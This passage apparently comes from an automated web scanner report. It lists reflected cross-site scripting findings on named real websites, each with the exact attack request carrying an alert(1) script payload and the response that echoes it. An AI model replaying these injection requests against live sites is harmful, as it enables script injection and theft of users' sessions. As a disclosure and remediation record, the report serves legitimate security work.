User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=0cplvbem6chaa1b42njbn3js30; expires=Thu, 26-May-2011 13:52:42 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
   
...[SNIP]...
<a rel="nofollow" onclick="                        window.open('http://www.travelagentcentral.com/favicon.ico?a0ef0"><script>alert(1)</script>004bb9d1fb8=1&print=1' ,'' ,'');" href="javascript:void(0)" class="print" rel="nofollow">
...[SNIP]...

6.104. http://www.upmystreet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.upmystreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 154da'%3balert(1)//fc891691e7e was submitted in the REST URL parameter 1. This input was echoed as 154da';alert(1)//fc891691e7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico154da'%3balert(1)//fc891691e7e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmystreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 03 May 2011 11:22:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Set-Cookie: umsLocId=uk; expires=Thu, 02-Jun-2011 11:22:45 GMT; path=/; domain=upmystreet.com
Set-Cookie: umsLocId=uk; expires=Thu, 02-Jun-2011 11:22:45 GMT; path=/; domain=upmystreet.com
Set-Cookie: PHPSESSID=q70dpe7839j7k219mprla3aid2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uswitch=1795230218.16415.0000; path=/
Vary: Accept-Encoding
Content-Length: 45783

b2ca
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<!--[CDATA[
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName = 'www.upmystreet.com/favicon.ico154da';alert(1)//fc891691e7e';
s.server="";
s.channel = '';
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5 = '';
s.prop6 = '';
s.prop21 = 'PR4 3HP';
s
...[SNIP]...

6.105. http://www.vermontjoblink.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e14f"><a>32f0ca47cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?1e14f"><a>32f0ca47cab=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vermontjoblink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:59:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4238884;expires=Thu, 25-Apr-2041 10:59:18 GMT;path=/
Set-Cookie: CFTOKEN=a337ccc50de11539-B58317FC-9B89-7B08-004A1FC31CD1B138;expires=Thu, 25-Apr-2041 10:59:18 GMT;path=/
Set-Cookie: CFID=4238884;path=/
Set-Cookie: CFTOKEN=a337ccc50de11539%2DB58317FC%2D9B89%2D7B08%2D004A1FC31CD1B138;path=/
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub -->
               <html lang="en">
               <head>
               <meta http-equiv="refresh" content="0;URL=https://www.vermontjoblink.com/ada/404/404_qry.cfm?404;http://www.vermontjoblink.com:80/favicon.ico?1e14f"><a>32f0ca47cab=1" />
...[SNIP]...

6.106. http://www.vivareal.us/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vivareal.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fa51<script>alert(1)</script>b3226e6c249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico8fa51<script>alert(1)</script>b3226e6c249 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vivareal.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Expires: Tue, 03 May 2011 10:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:47:30 GMT
Content-Length: 11182
Connection: close
Set-Cookie: JSESSIONID=E330D07AEE51FEE4827CA811EE3958D7; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<span>/favicon.ico8fa51<script>alert(1)</script>b3226e6c249/</span>
...[SNIP]...

6.107. http://www.wdasfm.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wdasfm.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb2ad"><script>alert(1)</script>867d071c772 was submitted in the REST URL parameter 1. This input was echoed as fb2ad\"><script>alert(1)</script>867d071c772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofb2ad"><script>alert(1)</script>867d071c772 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4191481514
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:31:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
<meta property="og:url" content="http://www.wdasfm.com/favicon.icofb2ad\"><script>alert(1)</script>867d071c772" />
...[SNIP]...

6.108. http://www.wdasfm.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wdasfm.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f7e"><script>alert(1)</script>b888178402f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8f7e\"><script>alert(1)</script>b888178402f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b8f7e"><script>alert(1)</script>b888178402f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4191442722
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:29:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:29:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
<meta property="og:url" content="http://www.wdasfm.com/favicon.ico?b8f7e\"><script>alert(1)</script>b888178402f=1" />
...[SNIP]...

6.109. http://www.web-stat.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.web-stat.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1067f'-alert(1)-'b7f7d77d581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico1067f'-alert(1)-'b7f7d77d581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.web-stat.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:37:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: referrer_id=; expires=Wed 02-May-2012 11:37:43 GMT; path=/
Set-Cookie: referred_by_affiliate=; domain=.web-stat.net; expires=Tue 03-May-2011 11:38:43 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI", policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Length: 11210


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<t
...[SNIP]...
<script type="text/javascript">

// BEGIN PARAMETERS
var page_name = 'favicon.ico1067f'-alert(1)-'b7f7d77d581';
var invisible = 'yes';
var text_counter = '#';
// END PARAMETERS

wtslog('al2474','1','http',page_name,invisible,text_counter);
</script>
...[SNIP]...

6.110. http://www.webdesign.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webdesign.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc655'%3balert(1)//8b15d10d7c was submitted in the REST URL parameter 1. This input was echoed as bc655';alert(1)//8b15d10d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icobc655'%3balert(1)//8b15d10d7c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webdesign.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=f3e5ad0dac14543eec27dfe2ee6d1572; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f3e5ad0dac14543eec27dfe2ee6d1572; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 2288
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Website Templates for web design (Dreamweaver, Frontpage, Flash)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="
...[SNIP]...
<script type="text/javascript">
try {
_gaq.push(['_setAccount', 'UA-2347512-1']);
_gaq.push(['_trackPageview']);
_gaq.push(['_trackEvent', 'SiteError', '404', '/favicon.icobc655';alert(1)//8b15d10d7c']);
} catch(err) {}
</script>
...[SNIP]...

6.111. http://www.webdesign.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webdesign.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4be24<script>alert(1)</script>e4bac863956 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4be24<script>alert(1)</script>e4bac863956 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webdesign.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=520abccfb55413c7b0597f912043928e; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=520abccfb55413c7b0597f912043928e; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 2316
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Website Templates for web design (Dreamweaver, Frontpage, Flash)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="
...[SNIP]...
<strong>/favicon.ico4be24<script>alert(1)</script>e4bac863956</strong>
...[SNIP]...

6.112. http://www.wireless-driver.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wireless-driver.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b5de'><script>alert(1)</script>fc86971b1f4 was submitted in the REST URL parameter 1. This input was echoed as 4b5de\'><script>alert(1)</script>fc86971b1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b5de'><script>alert(1)</script>fc86971b1f4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wireless-driver.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 03 May 2011 10:32:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Vary: Cookie
X-Pingback: http://www.wireless-driver.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 28264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<area shape='rect' coords='0,0,16,11' href='http://www.wireless-driver.com/favicon.ico4b5de\'><script>alert(1)</script>fc86971b1f4' id='flag_en' title='English'/>
...[SNIP]...

6.113. http://www.xcomment.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db980<script>alert(1)</script>03baad4d242 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodb980<script>alert(1)</script>03baad4d242 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38718

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<td width="90%" height="29" class="maintitletext">Favicon.icodb980<script>alert(1)</script>03baad4d242's Profile </td>
...[SNIP]...

6.114. http://www.xcomment.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3234f'><script>alert(1)</script>783c7457092 was submitted in the REST URL parameter 1. This input was echoed as 3234f\'><script>alert(1)</script>783c7457092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3234f'><script>alert(1)</script>783c7457092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38748

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<input name='user' type='hidden' value='Favicon.ico3234f\'><script>alert(1)</script>783c7457092' />
...[SNIP]...

6.115. http://www.xcomment.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96af4"><script>alert(1)</script>9b2bc11874d was submitted in the REST URL parameter 1. This input was echoed as 96af4\"><script>alert(1)</script>9b2bc11874d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico96af4"><script>alert(1)</script>9b2bc11874d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38748

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<form name="jumpcategory" method="post" action="http://www.xcomment.com/Favicon.ico96af4\"><script>alert(1)</script>9b2bc11874d&pg=1">
...[SNIP]...

6.116. http://www.xcomment.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload abab7</title><script>alert(1)</script>1f94ac6ba59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoabab7</title><script>alert(1)</script>1f94ac6ba59 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38798

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<title>Favicon.icoabab7</title><script>alert(1)</script>1f94ac6ba59's MySpace Graphics and Pictures for MySpace Comments</title>
...[SNIP]...

6.117. http://www.boomboomflicks.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boomboomflicks.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df75'-alert(1)-'66875c09aad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boomboomflicks.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 6df75'-alert(1)-'66875c09aad

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=e56256e5ef9fd75705f6b439f10a1357; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 133244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<html><title>Porn Tube
...[SNIP]...
<!--
document.cookie='atref=6df75'-alert(1)-'66875c09aad$$; path=/;'
// -->
...[SNIP]...

6.118. http://www.freshpreservingstore.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.freshpreservingstore.com
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cade9--><script>alert(1)</script>ab1eeaf5a81 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3cade9--><script>alert(1)</script>ab1eeaf5a81
Host: www.freshpreservingstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 May 2011 11:40:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8214
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSBSCSBB=FHEFGOODLANAEDBNNEIAHCGH; path=/
Cache-control: private
Set-Cookie: BIGipServerweb_freshpreservingstore_pool=2751467692.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <me
...[SNIP]...
<!-- .66 5/3/2011 7:40:00 AM curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3cade9--><script>alert(1)</script>ab1eeaf5a81 -->
...[SNIP]...

6.119. http://www.prosolutionpills.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.prosolutionpills.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 66d34--><script>alert(1)</script>7df68a51f3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=66d34--><script>alert(1)</script>7df68a51f3f

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:20:07 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
